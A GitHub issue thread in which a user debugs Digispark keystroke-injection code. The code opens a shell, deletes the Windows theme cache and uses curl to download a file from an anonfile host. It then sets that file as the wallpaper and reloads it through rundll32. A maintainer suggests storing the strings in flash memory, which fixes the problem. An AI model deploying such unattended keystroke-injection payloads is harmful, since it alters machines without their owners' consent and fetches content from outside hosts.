digistump/DigistumpArduino #118: DigiKeyboard

Fischchen, 2020-05-13:
Hey guys,
I have a problem:
I've written this code for my digispark rev.3:
```c++
#include "DigiKeyboard.h"
void setup() {
  // Open PowerShell
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.delay(1000);
  DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(600);

  // Set Layout to US

  DigiKeyboard.print("Set");
  DigiKeyboard.sendKeyStroke(56);
  DigiKeyboard.print("WinUserLanguageList ");
  DigiKeyboard.sendKeyStroke(56);
  DigiKeyboard.print("Force en");
  DigiKeyboard.sendKeyStroke(56);
  DigiKeyboard.print("US");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);
  DigiKeyboard.print("exit");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);

  // Exploit (Add your code here)

  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(600);
  DigiKeyboard.print("cmd");
  DigiKeyboard.delay(600);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(600);
  DigiKeyboard.println("cd %appdata%/Microsoft/Windows//Themes");
  DigiKeyboard.delay(600);
  DigiKeyboard.sendKeyStroke(0,KEY_ENTER);
  
  
  DigiKeyboard.delay(600);
  DigiKeyboard.print("del CachedFiles /q");
  DigiKeyboard.delay(600);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  
  DigiKeyboard.delay(600);
  DigiKeyboard.print("ren TranscodedWallpaper $TranscodedWallpaper");
  DigiKeyboard.delay(600);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  
  DigiKeyboard.delay(600);
  DigiKeyboard.print("curl -o TranscodedWallpaper.jpg ");
  DigiKeyboard.print("https://cdn-25.anonfile.com/51k288ycoc/434f6148-1589287301/Download");
  DigiKeyboard.delay(600);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(600);
  
  DigiKeyboard.print("ren TranscodedWallpaper.jpg TranscodedWallpaper");
  DigiKeyboard.delay(600);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(600);
  
  DigiKeyboard.println("RUNDLL32.EXE");
  DigiKeyboard.println(" user32.dll,UpdatePerUserSystemParameters");
  DigiKeyboard.delay(600); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(600);
  
  DigiKeyboard.print("exit");
  DigiKeyboard.delay(600);
  
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
 
  
  // Set Layout to DE

  DigiKeyboard.sendKeyStroke(0);
  DigiKeyboard.sendKeyStroke(KEY_D, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);
  DigiKeyboard.print("powershell");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);
  DigiKeyboard.print("Set-WinUserLanguageList -Force de-DE");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(2000);
  DigiKeyboard.print("exit");
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop() {

}```

But the code:
`  DigiKeyboard.println("RUNDLL32.EXE");
  DigiKeyboard.println(" user32.dll,UpdatePerUserSystemParameters");
  DigiKeyboard.delay(600); 
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
  DigiKeyboard.delay(600);
  `
Just makes everything stop working.
Does anybody know what I can do?
I already tried: Splitting the text to print into multiple command and putting it into a Variable and then printing it.

Thanks in Advance,
Fischchen

ps: Sorry for my bad English, this isn't my first language

pfeerick, 2020-05-13:
That's a lot of strings you're using... maybe your Digispark is running out of SRAM? Try wrapping **_all_** (every single byte counts!) of those strings with `F()` so that they're stored in Flash memory, instead of in SRAM. 

i.e.
```
DigiKeyboard.println(F(" user32.dll,UpdatePerUserSystemParameters"));
instead of 
DigiKeyboard.println(" user32.dll,UpdatePerUserSystemParameters");
```

Fischchen, 2020-05-13:
Thanks now it work!!!

closed 2020-05-13 by Fischchen